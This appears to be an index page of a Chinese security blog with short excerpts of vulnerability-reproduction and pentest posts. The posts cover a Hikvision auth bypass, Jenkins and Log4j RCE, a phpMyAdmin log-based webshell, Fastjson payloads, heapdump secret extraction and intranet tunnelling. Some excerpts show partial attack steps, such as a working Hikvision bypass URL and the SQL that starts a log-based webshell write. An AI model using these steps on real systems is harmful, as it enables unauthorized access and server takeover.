漏洞复现 - 海康威视未授权访问漏洞 (CVE-2017-7921) 📌 漏洞简介海康威视部分老版本设备存在认证绕过漏洞,攻击者可通过伪造的 Base64 auth 参数直接访问接口: 查看用户列表 抓取实时快照 下载配置文件并解密获取后门账户 🗂️ 漏洞利用步骤 ✅ 1️⃣ 查看系统用户列表访问示例: 1http://<IP>/Security/users?auth=YWRtaW46MTEK YWRtaW46MTEK 是 admin:1 2025-03-20 #漏洞复现 #海康威视 #未授权访问
漏洞复现 - 金蝶云星空 ScpSupRegHandler 任意文件上传漏洞 📌 漏洞简介金蝶云·星空(Kingdee Cloud Galaxy)是一款常用于企业 ERP 的云端产品。ScpSupRegHandler 是供应商注册模块的文件上传接口。 漏洞点: 该接口对上传文件的路径和后缀过滤不严; 攻击者可通过构造特殊路径穿越,写入自定义可执行的 .ashx 文件; 再利用 .ashx 文件生成 ASP 一句话木马,实现远程命令执行。 🗂️ 漏洞环境示例 目标: 2025-03-20 #漏洞复现 #金蝶云 #文件上传
漏洞复现 - Jenkins Script Console 未授权远程命令执行 🎯 漏洞简介Jenkins 是一款流行的开源 CI/CD 自动化部署工具,默认开启了 Script Console(脚本控制台),用于管理员执行 Groovy 脚本对 Jenkins 实例进行动态管理。 核心风险: Script Console 拥有与 Jenkins Master 相同的系统权限。 若攻击者可访问该接口且具备权限(或存在身份验证绕过),即可执行任意系统命令。 可直接 2025-03-20 #漏洞复现 #RCE #Jenkins
使用 nps 搭建内网穿透代理服务器 🚀 简介一款轻量级、高性能、功能强大的内网穿透代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用来访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等……,并带有功能强大的web管理端。 📌 VPS 端配置123456789101112# 拉取 nps Docker 镜像docker pull ffdfgdfg/nps# 启 2024-08-23 #隧道代理 #内网穿透
利用 phpMyAdmin 日志报错 getshell.md 🚀 简介利用 phpMyAdmin 的错误日志功能,可以巧妙地写入一句话木马,实现远程获取 WebShell。 🔥 利用步骤12345678910111213-- 查看当前日志记录状态show variables like "general_log%";-- 开启通用查询日志set global general_log='on';-- 设置日志文件保存 2024-08-23 #phpMyAdmin #getshell #web安全
漏洞复现 - Fastjson反序列化漏洞 简介Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 Github地址:https://github.com/vulhub/vulhub 123456# 下载项目git clone https://github.com/vulhub/vulhub.git 2024-08-23 #fastjson #漏洞复现 #反序列化
漏洞复现 - Apache Log4j2 RCE (CVE-2021-44228) 📌 简介Log4j2 是 Java 生态中使用最广泛的日志框架之一。CVE-2021-44228(俗称 Log4Shell)允许远程攻击者通过 JNDI 注入执行任意代码。 影响版本: 2.0-beta9 ~ 2.14.1 修复版本: >= 2.15.0 危害: RCE,完全控制目标服务器 🐳 靶场环境 - VulhubVulhub 是一个基于 Docker 的漏洞测试平 2024-08-23 #漏洞复现 #Log4j2 #反序列化 #JNDI注入
利用 heapdump 文件,提取明文密码、密钥等敏感信息 🚀 简介在渗透测试中,常见Spring应用暴露的heapdump文件能够被下载,但很多测试者不知道如何高效利用。本文分享几款实用工具,帮助最大化利用heapdump漏洞,快速提取明文密码、密钥等敏感信息,从而助力后续深度渗透。 📌 漏洞发现与利用流程 查看暴露的Actuator端点http://127.0.0.1:8088/actuator 下载heapdump文件http://127.0 2024-08-23 #信息泄露
fastjson 利用姿势和 payload 🚀说明 本项目涉及的一些姿势和payload是从之前的随手记的笔记直接粘进来的,很多找不到出处了所以来源未贴出来,望师傅们见谅。 判断是否用了fastjson鉴别fastjsonDNSLOG 1{"@type":"java.net.InetSocketAddress"{"address":,"val&qu 2024-08-23 #fastjson #payload
python编写的溯源工具 0、简介 🛠️这是一个用 Python 编写的溯源工具,方便快捷地查询恶意 IP 地址绑定的历史域名、域名解析 IP 以及备案信息等,助你轻松追踪网络威胁来源。🔍🌐 1、代码12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596 2024-08-16 #信息收集 #溯源反制